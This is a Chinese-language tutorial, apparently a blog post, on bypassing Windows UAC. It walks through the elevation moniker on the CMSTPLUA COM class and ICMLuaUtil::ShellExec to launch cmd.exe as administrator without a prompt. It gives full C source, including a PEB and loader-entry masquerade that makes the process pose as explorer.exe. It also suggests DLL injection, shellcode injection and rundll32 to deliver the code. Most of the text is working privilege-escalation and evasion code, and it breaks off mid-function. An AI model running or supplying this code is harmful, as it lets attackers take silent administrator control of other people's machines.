通过com组件BypassUAC

COM组件简介

COM component(COM组件)是微软公司为了计算机工业的软件生产更加符合人类的行为方式开发的一种新的软件开发技术。在COM构架下,人们可以开发出各种各样的功能专一的组件,然后将它们按照需要组合起来,构成复杂的应用系统。
com组件本质上是二进制文件(dll、exe,在windows系统内),其调用方法与c++的类相似,程序可以通过被称为CLSID(全局标识符)作为索引在注册表内找到具体的二进制文件,这篇文章只会介绍应用方法,具体的逆向分析会在之后的文章内详细解释(等公司买正版ida,现在用的盗版就不拿出来丢人了)。
windows提供了一种com组件提权的方法,其原意大概是为了方便开发,所以当这种提权方法的调用者是拥有微软签名的合法程序时(其本质是校验PEB),会忽略uac弹窗,这也为我们利用该技术埋下了隐患。
/*
 * Build an "Elevation:Administrator!new:{CLSID}" moniker for rclsid and ask
 * CoGetObject to bind it, returning the requested interface in *ppv.
 *
 * hwnd   - owner window stored in BIND_OPTS3.hwnd (may be NULL).
 * rclsid - class to activate; serialised with StringFromGUID2.
 * riid   - interface to return.
 * ppv    - receives the interface pointer on success.
 *
 * Returns the HRESULT of StringCchPrintf when the moniker does not fit,
 * otherwise whatever CoGetObject returns. Nothing in this function decides
 * whether a consent prompt is shown; per the article text, that is decided
 * by the elevation service from the identity of the calling process.
 */
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void ** ppv)
{
    WCHAR clsidText[50];
    WCHAR moniker[300];

    /* "{xxxxxxxx-xxxx-...}" text form of the CLSID. */
    StringFromGUID2(rclsid, clsidText, sizeof clsidText / sizeof clsidText[0]);

    HRESULT hr = StringCchPrintf(moniker,
                                 sizeof moniker / sizeof moniker[0],
                                 L"Elevation:Administrator!new:%s",
                                 clsidText);
    if (FAILED(hr)) {
        return hr;
    }

    /* Only the size, owner window and out-of-process context are set;
     * every other bind option stays zero. */
    BIND_OPTS3 opts;
    memset(&opts, 0, sizeof opts);
    opts.cbStruct = sizeof opts;
    opts.hwnd = hwnd;
    opts.dwClassContext = CLSCTX_LOCAL_SERVER;

    return CoGetObject(moniker, &opts, riid, ppv);
}
在com组件中,有一个名为ICMLuaUtil的接口,这个接口提供了一个名为ShellExec的方法,顾名思义,可以执行任意传入的命令,如果我们能用提权的ICMLuaUtil接口调用ShellExec,那么我们就能获得一个不受限的管理员令牌。

流程

    1.
    初始化com库
    2.
    创建提升权限的ICMLuaUtil接口
    3.
    调用ICMLuaUtil的ShellExec方法
    4.
    弹出一个高权限的calc(串戏了)。

代码

#include "BypassUAC.h"
/*
 * Build an "Elevation:Administrator!new:{CLSID}" moniker for rclsid and ask
 * CoGetObject to bind it, returning the requested interface in *ppv.
 *
 * hwnd   - owner window stored in BIND_OPTS3.hwnd (may be NULL).
 * rclsid - class to activate; serialised with StringFromGUID2.
 * riid   - interface to return.
 * ppv    - receives the interface pointer on success.
 *
 * Returns the HRESULT of StringCchPrintf when the moniker does not fit,
 * otherwise whatever CoGetObject returns. Whether a consent prompt appears
 * is not controlled here; per the article text, the elevation service decides
 * that from the identity of the calling process.
 */
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void** ppv)
{
    WCHAR clsidText[50];
    WCHAR moniker[300];

    /* "{xxxxxxxx-xxxx-...}" text form of the CLSID. */
    StringFromGUID2(rclsid, clsidText, sizeof clsidText / sizeof clsidText[0]);

    HRESULT hr = StringCchPrintf(moniker,
                                 sizeof moniker / sizeof moniker[0],
                                 L"Elevation:Administrator!new:%s",
                                 clsidText);
    if (FAILED(hr)) {
        return hr;
    }

    /* Only the size, owner window and out-of-process context are set;
     * every other bind option stays zero. */
    BIND_OPTS3 opts;
    memset(&opts, 0, sizeof opts);
    opts.cbStruct = sizeof opts;
    opts.hwnd = hwnd;
    opts.dwClassContext = CLSCTX_LOCAL_SERVER;

    return CoGetObject(moniker, &opts, riid, ppv);
}
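/*
 * Activate the CMSTPLUA class through the elevation moniker and call
 * ICMLuaUtil::ShellExec on it with lpwszExecutable.
 *
 * lpwszExecutable - program to launch; passed to ShellExec unchanged.
 *
 * Returns TRUE only when the activation and ShellExec both report success.
 * Fixes relative to the original: the activation HRESULT was ignored, so a
 * failed activation left CMLuaUtil NULL and the ShellExec call dereferenced
 * it; and success was judged by GetLastError(), which COM calls do not set --
 * the HRESULTs are examined instead. CoInitialize must already have been
 * called on this thread.
 */
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
{
    CLSID clsidICMLuaUtil = { 0 };
    IID iidICMLuaUtil = { 0 };
    ICMLuaUtil* CMLuaUtil = NULL;

    if (lpwszExecutable == NULL) {
        return FALSE;
    }

    /* CLSID_CMSTPLUA / IID_ICMLuaUtil are string forms, presumably defined in
     * BypassUAC.h; a malformed string makes either conversion fail. */
    if (FAILED(CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil)) ||
        FAILED(IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil))) {
        return FALSE;
    }

    /* On failure CMLuaUtil stays NULL, so both conditions are checked. */
    HRESULT hr = CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));
    if (FAILED(hr) || CMLuaUtil == NULL) {
        return FALSE;
    }

    hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);
    CMLuaUtil->lpVtbl->Release(CMLuaUtil);

    return SUCCEEDED(hr) ? TRUE : FALSE;
}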
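/*
 * Entry point of the sample: initialise COM on this thread, run the
 * elevated-ShellExec demonstration, then tear COM down.
 *
 * Returns 0 on completion, 1 when CoInitialize fails (the original ignored
 * that HRESULT and called into COM regardless).
 */
int main(void)
{
    if (FAILED(CoInitialize(NULL))) {
        return 1;
    }

    CMLuaUtilBypassUAC((LPWSTR)L"c:\\windows\\system32\\cmd.exe");

    CoUninitialize();
    return 0;
}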

利用方法

shellcode&dll注入

把这个代码写成一个dll,然后通过进程注入的方式获得一个合法的进程环境。
shellcode注入和dll注入差不多,只不过注入的具体dll被打成了shellcode,我记得有这么一个开源项目可以做到,原理类似于在dll二进制代码前写一个加载器

rundll32

rundll32是windows提供的一个合法exe,它能把一个单独的dll拉起来成为一个进程,这样拉起来的进程也被windows视为合法。

伪装进程

原理我之前的fakecommandline一文写过,在那篇文章的基础上再添加对ldr的伪装,就能绕过对进程的校验,具体的代码三号学生大佬写过this
#include "BypassUAC.h"

/* <string> is a C++ header, so this translation unit is presumably built as C++. */
#include <Shobjidl.h>
#include <string>
#pragma comment(lib, "ntdll.lib")

/* Array sizes used by the hand-declared PEB/TEB layouts further down. */
#define RTL_MAX_DRIVE_LETTERS 32
#define GDI_HANDLE_BUFFER_SIZE32 34
#define GDI_HANDLE_BUFFER_SIZE64 60
#define GDI_BATCH_BUFFER_SIZE 310

/* Pseudo-handle for the calling process, passed to NtAllocateVirtualMemory. */
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
#ifndef NT_SUCCESS
/* NTSTATUS success/informational codes are non-negative. */
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

/* The PEB's GDI handle buffer has a different length on x86 and x64. */
#if !defined(_M_X64)
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32
#else
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64
#endif

typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
/* Counted UTF-16 string as used by ntdll. In the native definition Length and
 * MaximumLength are byte counts, not character counts -- not verified here. */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING* PUNICODE_STRING;
/* Counted ANSI string; only used here as RTL_DRIVE_LETTER_CURDIR.DosPath. */
typedef struct _STRING {
    USHORT Length;
    USHORT MaximumLength;
    PCHAR Buffer;
} STRING;
typedef STRING* PSTRING;
/* Process/thread id pair; appears in the TEB as ClientId and RealClientId. */
typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
/* 64-bit-wide variant of CLIENT_ID; declared but not referenced in this file. */
typedef struct _CLIENT_ID64 {
    ULONG64 UniqueProcess;
    ULONG64 UniqueThread;
} CLIENT_ID64, * PCLIENT_ID64;
/*
 * Loader entry for one mapped module: the leading, version-stable part of
 * ntdll's LDR_DATA_TABLE_ENTRY (everything after LoadedImports is omitted).
 * supxLdrEnumModulesCallback compares DllBase with PEB.ImageBaseAddress and
 * rewrites FullDllName/BaseDllName of the matching entry. Because the
 * declaration is truncated, entries must only be reached through pointers
 * handed out by the loader -- never declared, copied or sizeof'ed here.
 */
typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    union
    {
        LIST_ENTRY InInitializationOrderLinks;
        LIST_ENTRY InProgressLinks;
    } DUMMYUNION0;
    PVOID DllBase;          /* matched against PEB.ImageBaseAddress in the callback */
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;   /* overwritten by supxLdrEnumModulesCallback */
    UNICODE_STRING BaseDllName;   /* overwritten by supxLdrEnumModulesCallback */
    union
    {
        ULONG Flags;
        struct
        {
            ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1
            ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1
            ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1
            ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1
            ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1
            ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1
            ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1
            ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1
            ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1
            ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1
            ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2
            ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1
            ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1
            ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1
            ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1
            ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2
            ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1
            ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1
            ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1
            ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1
            ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1
            ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1
            ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1
            ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1
            ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2
            ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1
            ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2
            ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1
        };
    } ENTRYFLAGSUNION;
    WORD ObsoleteLoadCount;
    WORD TlsIndex;
    union
    {
        LIST_ENTRY HashLinks;
        struct
        {
            PVOID SectionPointer;
            ULONG CheckSum;
        };
    } DUMMYUNION1;
    union
    {
        ULONG TimeDateStamp;
        PVOID LoadedImports;
    } DUMMYUNION2;
    //fields below removed for compatibility
} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;

/* Pointer type used by the LdrEnumerateLoadedModules callback below. */
typedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;
/* Head of the loader's module lists, reached through PEB.Ldr. Declared for
 * layout only: this file walks modules with LdrEnumerateLoadedModules and
 * never touches these lists directly. */
typedef struct _PEB_LDR_DATA {
    ULONG Length;
    BOOLEAN Initialized;
    HANDLE SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID EntryInProgress;
    BOOLEAN ShutdownInProgress;
    HANDLE ShutdownThreadId;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
/* Current directory record; used as RTL_USER_PROCESS_PARAMETERS.CurrentDirectory. */
typedef struct _CURDIR {
    UNICODE_STRING DosPath;
    HANDLE Handle;
} CURDIR, * PCURDIR;
/* Per-drive current directory; RTL_MAX_DRIVE_LETTERS of these sit in the
 * process parameters. Layout only -- not read by this file. */
typedef struct _RTL_DRIVE_LETTER_CURDIR {
    USHORT Flags;
    USHORT Length;
    ULONG TimeStamp;
    STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
/*
 * Process parameters block pointed to by PEB.ProcessParameters.
 * supMasqueradeProcess re-points ImagePathName and CommandLine at the
 * explorer.exe string while holding PEB.FastPebLock; every other field is
 * declared only so those two land at the right offset. Offsets are specific
 * to the Windows build this was copied from.
 */
typedef struct _RTL_USER_PROCESS_PARAMETERS {
    ULONG MaximumLength;
    ULONG Length;

    ULONG Flags;
    ULONG DebugFlags;

    HANDLE ConsoleHandle;
    ULONG ConsoleFlags;
    HANDLE StandardInput;
    HANDLE StandardOutput;
    HANDLE StandardError;

    CURDIR CurrentDirectory;
    UNICODE_STRING DllPath;
    UNICODE_STRING ImagePathName;   /* rewritten by supMasqueradeProcess */
    UNICODE_STRING CommandLine;     /* rewritten by supMasqueradeProcess */
    PVOID Environment;

    ULONG StartingX;
    ULONG StartingY;
    ULONG CountX;
    ULONG CountY;
    ULONG CountCharsX;
    ULONG CountCharsY;
    ULONG FillAttribute;

    ULONG WindowFlags;
    ULONG ShowWindowFlags;
    UNICODE_STRING WindowTitle;
    UNICODE_STRING DesktopInfo;
    UNICODE_STRING ShellInfo;
    UNICODE_STRING RuntimeData;
    RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];

    ULONG EnvironmentSize;
    ULONG EnvironmentVersion;
    PVOID PackageDependencyData; //8+
    ULONG ProcessGroupId;
    // ULONG LoaderThreads;
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
/*
 * Process Environment Block, declared by hand so the masquerade can address
 * the fields it needs: ImageBaseAddress (matched against loader entries in
 * supxLdrEnumModulesCallback), ProcessParameters and FastPebLock (used in
 * supMasqueradeProcess). Ldr is declared but not read here.
 *
 * The layout is tied to the Windows build it was copied from. If it drifts
 * from the running OS, the writes in supMasqueradeProcess land on the wrong
 * fields; nothing in this file checks the OS version first.
 * FLS_MAXIMUM_AVAILABLE is presumably the winnt.h constant.
 */
typedef struct _PEB {
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    union
    {
        BOOLEAN BitField;
        struct
        {
            BOOLEAN ImageUsesLargePages : 1;
            BOOLEAN IsProtectedProcess : 1;
            BOOLEAN IsImageDynamicallyRelocated : 1;
            BOOLEAN SkipPatchingUser32Forwarders : 1;
            BOOLEAN IsPackagedProcess : 1;
            BOOLEAN IsAppContainer : 1;
            BOOLEAN IsProtectedProcessLight : 1;
            BOOLEAN IsLongPathAwareProcess : 1;
        };
    };
    HANDLE Mutant;

    PVOID ImageBaseAddress;                       /* base of the main image */
    PPEB_LDR_DATA Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters; /* rewritten by supMasqueradeProcess */
    PVOID SubSystemData;
    PVOID ProcessHeap;
    PRTL_CRITICAL_SECTION FastPebLock;            /* held while ProcessParameters is rewritten */
    PVOID AtlThunkSListPtr;
    PVOID IFEOKey;
    union
    {
        ULONG CrossProcessFlags;
        struct
        {
            ULONG ProcessInJob : 1;
            ULONG ProcessInitializing : 1;
            ULONG ProcessUsingVEH : 1;
            ULONG ProcessUsingVCH : 1;
            ULONG ProcessUsingFTH : 1;
            ULONG ProcessPreviouslyThrottled : 1;
            ULONG ProcessCurrentlyThrottled : 1;
            ULONG ReservedBits0 : 25;
        };
        ULONG EnvironmentUpdateCount;
    };
    union
    {
        PVOID KernelCallbackTable;
        PVOID UserSharedInfoPtr;
    };
    ULONG SystemReserved[1];
    ULONG AtlThunkSListPtr32;
    PVOID ApiSetMap;
    ULONG TlsExpansionCounter;
    PVOID TlsBitmap;
    ULONG TlsBitmapBits[2];
    PVOID ReadOnlySharedMemoryBase;
    PVOID HotpatchInformation;
    PVOID* ReadOnlyStaticServerData;
    PVOID AnsiCodePageData;
    PVOID OemCodePageData;
    PVOID UnicodeCaseTableData;

    ULONG NumberOfProcessors;
    ULONG NtGlobalFlag;

    LARGE_INTEGER CriticalSectionTimeout;
    SIZE_T HeapSegmentReserve;
    SIZE_T HeapSegmentCommit;
    SIZE_T HeapDeCommitTotalFreeThreshold;
    SIZE_T HeapDeCommitFreeBlockThreshold;

    ULONG NumberOfHeaps;
    ULONG MaximumNumberOfHeaps;
    PVOID* ProcessHeaps;

    PVOID GdiSharedHandleTable;
    PVOID ProcessStarterHelper;
    ULONG GdiDCAttributeList;

    PRTL_CRITICAL_SECTION LoaderLock;

    ULONG OSMajorVersion;
    ULONG OSMinorVersion;
    USHORT OSBuildNumber;
    USHORT OSCSDVersion;
    ULONG OSPlatformId;
    ULONG ImageSubsystem;
    ULONG ImageSubsystemMajorVersion;
    ULONG ImageSubsystemMinorVersion;
    ULONG_PTR ImageProcessAffinityMask;
    GDI_HANDLE_BUFFER GdiHandleBuffer;            /* length differs between x86 and x64 */
    PVOID PostProcessInitRoutine;

    PVOID TlsExpansionBitmap;
    ULONG TlsExpansionBitmapBits[32];

    ULONG SessionId;

    ULARGE_INTEGER AppCompatFlags;
    ULARGE_INTEGER AppCompatFlagsUser;
    PVOID pShimData;
    PVOID AppCompatInfo;

    UNICODE_STRING CSDVersion;

    PVOID ActivationContextData;
    PVOID ProcessAssemblyStorageMap;
    PVOID SystemDefaultActivationContextData;
    PVOID SystemAssemblyStorageMap;

    SIZE_T MinimumStackCommit;

    PVOID* FlsCallback;
    LIST_ENTRY FlsListHead;
    PVOID FlsBitmap;
    ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
    ULONG FlsHighIndex;

    PVOID WerRegistrationData;
    PVOID WerShipAssertPtr;
    PVOID pContextData;
    PVOID pImageHeaderHash;
    union
    {
        ULONG TracingFlags;
        struct
        {
            ULONG HeapTracingEnabled : 1;
            ULONG CritSecTracingEnabled : 1;
            ULONG LibLoaderTracingEnabled : 1;
            ULONG SpareTracingBits : 29;
        };
    };
    ULONGLONG CsrServerReadOnlySharedMemoryBase;
} PEB, * PPEB;
/* GDI batching area embedded in the TEB; declared only so TEB offsets are right. */
typedef struct _GDI_TEB_BATCH {
    ULONG Offset;
    UCHAR Alignment[4];
    ULONG_PTR HDC;
    ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
/* Context record referenced by TEB_ACTIVE_FRAME; layout only, not read here. */
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
    ULONG Flags;
    PSTR FrameName;
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
/* Singly linked frame record pointed to by TEB.ActiveFrame; layout only. */
typedef struct _TEB_ACTIVE_FRAME {
    ULONG Flags;
    struct _TEB_ACTIVE_FRAME* Previous;
    PTEB_ACTIVE_FRAME_CONTEXT Context;
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
/*
 * Thread Environment Block. The only field this file reads is
 * ProcessEnvironmentBlock (see NtCurrentPeb); everything else is declared
 * so that field sits at the right offset. SpareBytes, Instrumentation and
 * the BStore members differ between x86 and x64, hence the _M_X64 blocks.
 * As with the PEB, the layout must match the running OS build and is not
 * verified at runtime.
 */
typedef struct _TEB {
    NT_TIB NtTib;

    PVOID EnvironmentPointer;
    CLIENT_ID ClientId;
    PVOID ActiveRpcHandle;
    PVOID ThreadLocalStoragePointer;
    PPEB ProcessEnvironmentBlock;   /* read by NtCurrentPeb() */

    ULONG LastErrorValue;
    ULONG CountOfOwnedCriticalSections;
    PVOID CsrClientThread;
    PVOID Win32ThreadInfo;
    ULONG User32Reserved[26];
    ULONG UserReserved[5];
    PVOID WOW32Reserved;
    LCID CurrentLocale;
    ULONG FpSoftwareStatusRegister;
    PVOID SystemReserved1[54];
    NTSTATUS ExceptionCode;
    PVOID ActivationContextStackPointer;
#if defined(_M_X64)
    UCHAR SpareBytes[24];
#else
    UCHAR SpareBytes[36];
#endif
    ULONG TxFsContext;

    GDI_TEB_BATCH GdiTebBatch;
    CLIENT_ID RealClientId;
    HANDLE GdiCachedProcessHandle;
    ULONG GdiClientPID;
    ULONG GdiClientTID;
    PVOID GdiThreadLocalInfo;
    ULONG_PTR Win32ClientInfo[62];
    PVOID glDispatchTable[233];
    ULONG_PTR glReserved1[29];
    PVOID glReserved2;
    PVOID glSectionInfo;
    PVOID glSection;
    PVOID glTable;
    PVOID glCurrentRC;
    PVOID glContext;

    NTSTATUS LastStatusValue;
    UNICODE_STRING StaticUnicodeString;
    WCHAR StaticUnicodeBuffer[261];

    PVOID DeallocationStack;
    PVOID TlsSlots[64];
    LIST_ENTRY TlsLinks;

    PVOID Vdm;
    PVOID ReservedForNtRpc;
    PVOID DbgSsReserved[2];

    ULONG HardErrorMode;
#if defined(_M_X64)
    PVOID Instrumentation[11];
#else
    PVOID Instrumentation[9];
#endif
    GUID ActivityId;

    PVOID SubProcessTag;
    PVOID EtwLocalData;
    PVOID EtwTraceData;
    PVOID WinSockData;
    ULONG GdiBatchCount;

    union
    {
        PROCESSOR_NUMBER CurrentIdealProcessor;
        ULONG IdealProcessorValue;
        struct
        {
            UCHAR ReservedPad0;
            UCHAR ReservedPad1;
            UCHAR ReservedPad2;
            UCHAR IdealProcessor;
        };
    };

    ULONG GuaranteedStackBytes;
    PVOID ReservedForPerf;
    PVOID ReservedForOle;
    ULONG WaitingOnLoaderLock;
    PVOID SavedPriorityState;
    ULONG_PTR SoftPatchPtr1;
    PVOID ThreadPoolData;
    PVOID* TlsExpansionSlots;
#if defined(_M_X64)
    PVOID DeallocationBStore;
    PVOID BStoreLimit;
#endif
    ULONG MuiGeneration;
    ULONG IsImpersonating;
    PVOID NlsCache;
    PVOID pShimData;
    ULONG HeapVirtualAffinity;
    HANDLE CurrentTransactionHandle;
    PTEB_ACTIVE_FRAME ActiveFrame;
    PVOID FlsData;

    PVOID PreferredLanguages;
    PVOID UserPrefLanguages;
    PVOID MergedPrefLanguages;
    ULONG MuiImpersonation;

    union
    {
        USHORT CrossTebFlags;
        USHORT SpareCrossTebBits : 16;
    };
    union
    {
        USHORT SameTebFlags;
        struct
        {
            USHORT SafeThunkCall : 1;
            USHORT InDebugPrint : 1;
            USHORT HasFiberData : 1;
            USHORT SkipThreadAttach : 1;
            USHORT WerInShipAssertCode : 1;
            USHORT RanProcessInit : 1;
            USHORT ClonedThread : 1;
            USHORT SuppressDebugMsg : 1;
            USHORT DisableUserStackWalk : 1;
            USHORT RtlExceptionAttached : 1;
            USHORT InitialThread : 1;
            USHORT SpareSameTebBits : 1;
        };
    };

    PVOID TxnScopeEnterCallback;
    PVOID TxnScopeExitCallback;
    PVOID TxnScopeContext;
    ULONG LockCount;
    ULONG SpareUlong0;
    PVOID ResourceRetValue;
} TEB, * PTEB;
/* Callback signature for LdrEnumerateLoadedModules; supxLdrEnumModulesCallback
 * below has exactly this shape. Setting *StopEnumeration ends the walk. */
typedef VOID(NTAPI* PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(
    _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
    _In_ PVOID Context,
    _Inout_ BOOLEAN* StopEnumeration
    );

/*
 * ntdll routines used by supMasqueradeProcess, declared as plain
 * function-pointer globals. main() fills them in with GetProcAddress; until
 * then each is NULL and calling through it would fault. Giving the variables
 * the same names as the ntdll exports while ntdll.lib is also linked (see the
 * #pragma comment above) might collide at link time on some toolchains; a
 * distinct prefix would avoid the question -- not verified here.
 */
typedef PVOID NTAPI RTLINITUNICODESTRING(
    _Inout_ PUNICODE_STRING DestinationString,
    _In_opt_ PCWSTR SourceString
    );
typedef RTLINITUNICODESTRING FAR* LPRTLINITUNICODESTRING;
LPRTLINITUNICODESTRING RtlInitUnicodeString;

typedef NTSTATUS NTAPI RTLENTERCRITICALSECTION(
    _In_ PRTL_CRITICAL_SECTION CriticalSection
    );
typedef RTLENTERCRITICALSECTION FAR* LPRTLENTERCRITICALSECTION;
LPRTLENTERCRITICALSECTION RtlEnterCriticalSection;

typedef NTSTATUS NTAPI RTLLEAVECRITICALSECTION(
    _In_ PRTL_CRITICAL_SECTION CriticalSection
    );
typedef RTLLEAVECRITICALSECTION FAR* LPRTLLEAVECRITICALSECTION;
LPRTLLEAVECRITICALSECTION RtlLeaveCriticalSection;

typedef NTSTATUS NTAPI LDRENUMERATELOADEDMODULES(
    _In_opt_ ULONG Flags,
    _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,
    _In_opt_ PVOID Context);
typedef LDRENUMERATELOADEDMODULES FAR* LPLDRENUMERATELOADEDMODULES;
LPLDRENUMERATELOADEDMODULES LdrEnumerateLoadedModules;

typedef NTSTATUS NTAPI NTALLOCATEVIRTUALMEMORY(
    _In_ HANDLE ProcessHandle,
    _Inout_ PVOID* BaseAddress,
    _In_ ULONG_PTR ZeroBits,
    _Inout_ PSIZE_T RegionSize,
    _In_ ULONG AllocationType,
    _In_ ULONG Protect
    );
typedef NTALLOCATEVIRTUALMEMORY FAR* LPNTALLOCATEVIRTUALMEMORY;
LPNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory;

/* Path the process will claim as its image and command line. Kept at file
 * scope because RtlInitUnicodeString is expected to point the UNICODE_STRING
 * at this buffer rather than copy it, so it has to outlive every use --
 * confirm against the ntdll contract. */
LPWSTR g_lpszExplorer2 = (LPWSTR)L"C:\\windows\\explorer.exe";
/*
 * LdrEnumerateLoadedModules callback: find the loader entry whose DllBase is
 * the main image (PEB.ImageBaseAddress, passed in Context) and re-point its
 * FullDllName/BaseDllName at the explorer.exe strings, then stop the walk.
 * Every other entry is left alone and the enumeration continues.
 *
 * DataTableEntry  - current loader entry.
 * Context         - PPEB of this process, as passed by supMasqueradeProcess.
 * StopEnumeration - set TRUE once the main image has been patched.
 */
VOID NTAPI supxLdrEnumModulesCallback(
    _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
    _In_ PVOID Context,
    _Inout_ BOOLEAN* StopEnumeration
)
{
    PPEB peb = (PPEB)Context;
    BOOLEAN isMainImage = (DataTableEntry->DllBase == peb->ImageBaseAddress);

    /* The walk ends exactly when the main image has been found. */
    *StopEnumeration = isMainImage;
    if (!isMainImage) {
        return;
    }

    RtlInitUnicodeString(&DataTableEntry->FullDllName, g_lpszExplorer2);
    RtlInitUnicodeString(&DataTableEntry->BaseDllName, L"explorer.exe");
}
/* Current process's PEB, taken from the calling thread's TEB
 * (ProcessEnvironmentBlock is the only TEB field this file relies on). */
__inline struct _PEB* NtCurrentPeb()
{
    struct _TEB* teb = NtCurrentTeb();
    return teb->ProcessEnvironmentBlock;
}
/*
 * Rewrite this process's own identity as seen through its PEB so that it
 * reads as explorer.exe: first ImagePathName and CommandLine in the process
 * parameters (under FastPebLock), then FullDllName/BaseDllName of the main
 * image's loader entry (via supxLdrEnumModulesCallback). This is the "PEB
 * check" the article refers to. Nothing here touches the on-disk image or
 * the token, so kernel-side views of the process presumably still show the
 * real binary -- confirm.
 *
 * Preconditions: NtAllocateVirtualMemory, RtlEnterCriticalSection,
 * RtlInitUnicodeString, RtlLeaveCriticalSection and LdrEnumerateLoadedModules
 * must already have been resolved (main() does that with GetProcAddress);
 * before that they are NULL and the calls below would fault.
 *
 * Returns nothing. A failed NtAllocateVirtualMemory silently skips the whole
 * rewrite; the return values of the Rtl*/Ldr* calls are not examined.
 */
VOID supMasqueradeProcess(
    VOID
)
{

    NTSTATUS Status;
    PPEB Peb = NtCurrentPeb();
    SIZE_T RegionSize;

    /* One page is committed here but g_lpszExplorer is never written to or
     * read again: the strings below point at the g_lpszExplorer2 literal
     * instead. This looks like a leftover; the page is simply leaked and only
     * the allocation's status gates the rewrite. */
    PVOID g_lpszExplorer = NULL;
    RegionSize = 0x1000;

    Status = NtAllocateVirtualMemory(
        NtCurrentProcess(),
        &g_lpszExplorer,
        0,
        &RegionSize,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE);

    if (NT_SUCCESS(Status)) {
